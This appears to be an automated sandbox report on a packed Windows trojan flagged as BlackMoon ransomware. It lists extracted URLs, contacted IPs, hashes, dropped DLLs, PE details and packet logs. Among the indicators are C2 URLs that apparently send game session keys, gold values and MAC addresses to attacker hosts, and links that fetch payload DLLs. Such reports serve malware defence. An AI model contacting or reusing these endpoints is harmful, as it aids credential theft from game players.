https://pki.jemmylovejenny.tk/rpa0 | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://Mozilla/4.0 | 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.dr | false | Avira URL Cloud: safe | unknown
http://.https | 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.dr | false | Avira URL Cloud: safe | unknown
http://ocsp.certum.pl0. | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | false | Avira URL Cloud: safe | unknown
http://61.160.207.3:8003/api | 8001[1].dll.0.dr | false | Avira URL Cloud: safe | unknown
https://wwug.lanzouq.com/huohansss | 1734098836319.exe, 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.dr | false | Avira URL Cloud: safe | unknown
http://www.eyuyan.com | 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://cacerts.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA.crt0 | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://43.226.78.44:8000/macweb/submit/&mac_address=channel_number=url | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://www.wegame.com.cn/api/v1/wegame.platform.game.TicketProxy/GetGameTicket | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://crls.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA.crl0 | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://www.uc.cn/ipIP:https://api.ip.sb/iphttp://pv.sohu.com/cityjson | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.certum.pl/l3.crl0a | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | false | | high
http://repository.certum.pl/ca.cer0: | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | false | | high
http://subca.ocsp-certum.com0. | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://wwug.lanzouq.com/huohanssss.dll | 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.dr | false | Avira URL Cloud: safe | unknown
http://repository.certum.pl/ctnca.cer0 | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | false | | high
http://cs-g2-crl.thawte.com/ThawteCSG2.crl0 | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://subca.ocsp-certum.com01 | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | false | | high
http://pv.sohu.com/cityjson | 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://pki.jemmylovejenny.tk/cps0/ | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://crls.pki.jemmylovejenny.tk/EVRootCA.crl0 | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://www.certum.pl/CPS0 | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | false | | high
https://wwug.lanzouq.com/huohanqqqQ.dll | 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.dr | false | Avira URL Cloud: safe | unknown
http://i.2.wen888.shop:4002/index/user.html | 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://api.ip.sb/ip | 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://crl.certum.pl/ctnca.crl0k | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | false | | high
http://i.2.wen888.shop:4002/index/user.html&code=data&Game_Cient_Key_=&Game_St_=&Game_St_Key_=&gold= | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.thawte.com0 | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://www.lanzout.comRefererMozilla/5.0 | 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.dr | false | Avira URL Cloud: safe | unknown
https://cesg1.oss-cn-beijing.aliyuncs.com/;W | 1734098836319.exe, 00000000.00000002.2952794089.00000000008E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ip.cn/index.php | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://www.ip138.comUser-Agent: | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://cacerts.pki.jemmylovejenny.tk/EVRootCA.crt0? | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dllo | 1734098836319.exe, 00000000.00000002.2952794089.0000000000901000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.certum.pl/CPS0 | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | false | | high
http://ocsp.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA0O | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://cesg1.oss-cn-beijing.aliyuncs.com/ | 1734098836319.exe, 00000000.00000002.2952794089.0000000000901000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.certum.pl/repository.0 | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | false | Avira URL Cloud: safe | unknown
http://bbs.dult.cn/thread-24328-1-1.html | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.thawte.com/ThawtePCA.crl0 | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://www.eyuyan.comservice | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ip138.com | 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://ocsp.pki.jemmylovejenny.tk/EVRootCA0= | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://wwug.lanzouq.com/huohanqqq | 1734098836319.exe, 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.dr | false | Avira URL Cloud: safe | unknown
https://User-Agent:Mozilla/4.0 | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://www.lanzout.com | 1734098836319.exe, 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.dr | false | Avira URL Cloud: safe | unknown
http://crl.certum.pl/ca.crl0h | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | false | | high
https://api.ttt.sh/ip/qqwry/ | 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://repository.certum.pl/l3.cer0 | 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | false | | high
https://api.ttt.sh/ip/qqwry/ip | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://www.uc.cn/ip | 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://www.dult.cn/100.txt | 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
43.226.78.44 | unknown | China | | 134762 | CHINANET-LIAONING-DALIAN-MANCHINANETLiaoningprovinceDali | false
39.103.20.61 | sc-2dwy.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | China | | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | false
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1583248
                                                              Start date and time:2025-01-02 09:27:32 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 6m 19s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:5
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:1734098836319.exe
                                                              Detection:MAL
                                                              Classification:mal100.rans.troj.evad.winEXE@1/3@1/2
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:
                                                              • Successful, ratio: 95%
                                                              • Number of executed functions: 49
                                                              • Number of non-executed functions: 201
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded IPs from analysis (whitelisted): 4.245.163.56, 52.149.20.212, 13.107.246.45
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              No simulations
                                                              No context
                                                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CHINANET-LIAONING-DALIAN-MAN CHINANET Liaoning province Dali | loligang.arm.elf | malicious | Mirai | 59.44.115.229
CHINANET-LIAONING-DALIAN-MAN CHINANET Liaoning province Dali | spc.elf | malicious | Mirai, Moobot | 182.201.246.96
CHINANET-LIAONING-DALIAN-MAN CHINANET Liaoning province Dali | db0fa4b8db0333367e9bda3ab68b8042.i686.elf | malicious | Mirai, Gafgyt | 123.185.162.24
CHINANET-LIAONING-DALIAN-MAN CHINANET Liaoning province Dali | nklppc.elf | malicious | Unknown | 219.149.1.128
CHINANET-LIAONING-DALIAN-MAN CHINANET Liaoning province Dali | mipsel.nn.elf | malicious | Mirai, Okiru | 59.46.216.198
CHINANET-LIAONING-DALIAN-MAN CHINANET Liaoning province Dali | rebirth.mips.elf | malicious | Mirai, Okiru | 182.201.61.201
CHINANET-LIAONING-DALIAN-MAN CHINANET Liaoning province Dali | x86_64.nn.elf | malicious | Mirai, Okiru | 59.46.171.92
CHINANET-LIAONING-DALIAN-MAN CHINANET Liaoning province Dali | la.bot.mipsel.elf | malicious | Unknown | 43.226.54.234
CHINANET-LIAONING-DALIAN-MAN CHINANET Liaoning province Dali | la.bot.arm.elf | malicious | Unknown | 182.201.168.77
CHINANET-LIAONING-DALIAN-MAN CHINANET Liaoning province Dali | meerkat.mpsl.elf | malicious | Mirai | 182.201.246.93
CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co Ltd | armv4l.elf | malicious | Unknown | 59.82.127.195
CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co Ltd | armv6l.elf | malicious | Unknown | 39.106.221.219
CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co Ltd | DF2.exe | malicious | Unknown | 59.110.52.4
CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co Ltd | loligang.sh4.elf | malicious | Mirai | 121.198.26.154
CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co Ltd | loligang.arm7.elf | malicious | Mirai | 47.103.186.206
CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co Ltd | loligang.spc.elf | malicious | Mirai | 8.130.21.60
CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co Ltd | 0000000000000000.exe | malicious | Nitol | 39.103.20.97
CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co Ltd | 0000000000000000.exe | malicious | Unknown | 39.103.20.97
CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co Ltd | kwari.mpsl.elf | malicious | Unknown | 42.120.21.89
CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co Ltd | botx.sh4.elf | malicious | Mirai | 47.124.9.123
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | ETVk1yP43q.exe | malicious | AZORult | 39.103.20.61
37f463bf4616ecd445d4a1937da06e19 | 16oApcahEa.exe | malicious | Babuk, Djvu | 39.103.20.61
37f463bf4616ecd445d4a1937da06e19 | 6a7e35.msi | malicious | Unknown | 39.103.20.61
37f463bf4616ecd445d4a1937da06e19 | ipmsg5.6.18_installer.exe | malicious | Unknown | 39.103.20.61
37f463bf4616ecd445d4a1937da06e19 | OXoeX1Ii3x.exe | malicious | Unknown | 39.103.20.61
37f463bf4616ecd445d4a1937da06e19 | OXoeX1Ii3x.exe | malicious | Unknown | 39.103.20.61
37f463bf4616ecd445d4a1937da06e19 | 0000000000000000.exe | malicious | Nitol | 39.103.20.61
37f463bf4616ecd445d4a1937da06e19 | 0000000000000000.exe | malicious | Unknown | 39.103.20.61
37f463bf4616ecd445d4a1937da06e19 | 1.ps1 | malicious | Unknown | 39.103.20.61
37f463bf4616ecd445d4a1937da06e19 | setup.exe | malicious | Unknown | 39.103.20.61
No context
Process: C:\Users\user\Desktop\1734098836319.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: modified
Size (bytes): 229376
Entropy (8bit): 6.1512063055315265
Encrypted: false
SSDEEP: 3072:HlZIltUhIioS11QLUV9CO1DDaJY6G3n8kkrXvwqyeEsZhCzPLqZXO8KtZjUN:Hl+e1QLUnkrX4lACzPOZ
MD5: 0269CBD8F0D55E1B87BE84F31EE9F4C0
SHA1: 8569CDEFBF755DB8757D65FE9C15DCAF79161C4D
SHA-256: BEE91060C96CBD0607171906ADB7C98E956C1D09149C1F3C4537DB223987AE8B
SHA-512: 293CDB4949BA524FEE86C835DF149E9ED6FEAF9BC3C9DB85F7F4AEDA4B03016666EAB85131CE2C68D169324B5B36C189945002FFCB6ADD2C4008B33459EBFD43
Malicious: true
Yara Hits:
• Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll, Author: Joe Security
• Rule: MALWARE_Win_BlackMoon, Description: Detects executables using BlackMoon RunTime, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll, Author: ditekSHen
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 48%
Reputation: low
Process: C:\Users\user\Desktop\1734098836319.exe
File Type: JSON data
Category: dropped
Size (bytes): 80
Entropy (8bit): 4.771762239033051
Encrypted: false
SSDEEP: 3:YM9EGJwHNMWCSKWWIZp0sJ/0q:YMxJwVbKRyasJp
MD5: D23BB21574417F12B294995F7C692153
SHA1: 11073AC83A3C8E5292920BF76BE1851411C1E9FA
SHA-256: C48336A513BF05B3369B1F874C9F2EC19ADD4E55571C0354676C2C2360B42287
SHA-512: CAA26520E2FDF2C520DDC17341119F13F7B91C855026574DD077E1E3BA30B5A7D3BAFB29D675C77873AC82EFE6A16B247DFEC6324DBD6633F69BCBFD05575E12
Malicious: false
Reputation: low
Preview: {"is_active": true, "url": "https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dll"}
Process: C:\Users\user\Desktop\1734098836319.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1323832
Entropy (8bit): 5.936047058989444
Encrypted: false
SSDEEP: 12288:taur3falhmSv7PYH3wEploa6ie5VOOETgno+CmL/injt3ZJ5pZJ5pZJoUV:IuzM7k3wJmOKMCmL2
MD5: A76C18B971D6427CDFFFD317C90AAA2D
SHA1: 58873852F11E80E27194A5DCFB64D22E13248190
SHA-256: 48D5F6E4C6C71DD950EA069970489580E5AD78BC475B5D4F472C8409D02B3A18
SHA-512: C73915F9085CF621E409399EBD64F0B8BE8C53FC1AE404A67C2B8D7F7A9CEE8276397D36B002235109650A2C8C07CA6EC34A8841534ACBB15EF26FC4FE0CEF96
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit): 7.997180952275106
TrID:
• Win32 Executable (generic) a (10002005/4) 99.39%
• UPX compressed Win32 Executable (30571/9) 0.30%
• Win32 EXE Yoda's Crypter (26571/9) 0.26%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name: 1734098836319.exe
File size: 547'840 bytes
MD5: b2524709c9b62c107eaa1235db37cbdb
SHA1: 798cbea0bbe9b23462be4c5e8a3743399cd529d5
SHA256: e40b03e684f2db354aabacfc64cdaaaff31d27e844febf87c9af66cd39d74989
SHA512: 69b90a78ada1df03d6716077e98d88eca45809f4f70bbff4169ea908e7765ccf88cf928345fddc379af8819f575c938f2b676468617d5055ac7eca73e30101f8
SSDEEP: 12288:CvGfiU7cXS/yAtQrHw31QW52JStw8wkvVsx4/ptI/pKYP6EKoQXXoS:Cv8isyAtQTk1n2Mt9iqSRPPKoQX
TLSH: 5EC4230FF7A98312DC885EB60D8F3ACD2514D03391DEFFA53CA99DED588960EC554A82
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x6be4f0
Entrypoint Section: UPX1
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp: 0x675C30AC [Fri Dec 13 13:03:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 28d14723f510a4f77e0b80373dcbac2d
Instruction
pushad
mov esi, 0063A000h
lea edi, dword ptr [esi-00239000h]
push edi
mov ebp, esp
lea ebx, dword ptr [esp-00003E80h]
xor eax, eax
push eax
cmp esp, ebx
jne 00007FC5D891FD0Dh
inc esi
inc esi
push ebx
push 002BC85Bh
push edi
add ebx, 04h
push ebx
push 000844EBh
push esi
add ebx, 04h
push ebx
push eax
mov dword ptr [ebx], 00020003h
nop
nop
nop
nop
nop
push ebp
push edi
push esi
push ebx
sub esp, 7Ch
mov edx, dword ptr [esp+00000090h]
mov dword ptr [esp+74h], 00000000h
mov byte ptr [esp+73h], 00000000h
mov ebp, dword ptr [esp+0000009Ch]
lea eax, dword ptr [edx+04h]
mov dword ptr [esp+78h], eax
mov eax, 00000001h
movzx ecx, byte ptr [edx+02h]
mov ebx, eax
shl ebx, cl
mov ecx, ebx
dec ecx
mov dword ptr [esp+6Ch], ecx
movzx ecx, byte ptr [edx+01h]
shl eax, cl
dec eax
mov dword ptr [esp+68h], eax
mov eax, dword ptr [esp+000000A8h]
movzx esi, byte ptr [edx]
mov dword ptr [ebp+00h], 00000000h
mov dword ptr [esp+60h], 00000000h
mov dword ptr [eax], 00000000h
mov eax, 00000300h
mov dword ptr [esp+64h], esi
mov dword ptr [esp+5Ch], 00000001h
mov dword ptr [esp+58h], 00000001h
mov dword ptr [esp+54h], 00000001h
Programming Language:
• [ C ] VS98 (6.0) SP6 build 8804
• [ C ] VS98 (6.0) build 8168
• [C++] VS98 (6.0) SP6 build 8804
• [C++] VS98 (6.0) build 8168
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2c0294 | 0x35c | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c0000 | 0x294 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x239000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0x23a000 | 0x86000 | 0x85200 | 74bbb1187f5f2ab3b98ffc5d25fb386a | False | 0.9975773914319249 | ARC archive data, packed | 7.999216562896292 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2c0000 | 0x1000 | 0x600 | 90e3570e7f941119ce23c09cc8ca603b | False | 0.48046875 | data | 3.950684677858209 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x2c005c | 0x238 | data | Chinese | China | 0.5264084507042254
DLL | Import
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll | RegCloseKey
CRYPT32.dll | CryptUnprotectMemory
iphlpapi.dll | SendARP
ole32.dll | OleRun
oleaut32.dll | VarR8FromBool
psapi.dll | GetModuleInformation
shell32.dll | SHGetSpecialFolderPathA
shlwapi.dll | StrToIntW
USER32.dll | wsprintfA
version.dll | VerQueryValueA
WINHTTP.dll | WinHttpOpen
WININET.dll | InternetOpenA
ws2_32.dll | WSAStartup
Language of compilation system | Country where language is spoken
Chinese | China
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Jan 2, 2025 09:28:30.994453907 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.994509935 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.995279074 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.995340109 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.995343924 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.995362997 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.995393991 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.995423079 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.996206045 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.996260881 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.997035980 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.997085094 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.997103930 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.997163057 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.997829914 CET4434973139.103.20.61192.168.2.4
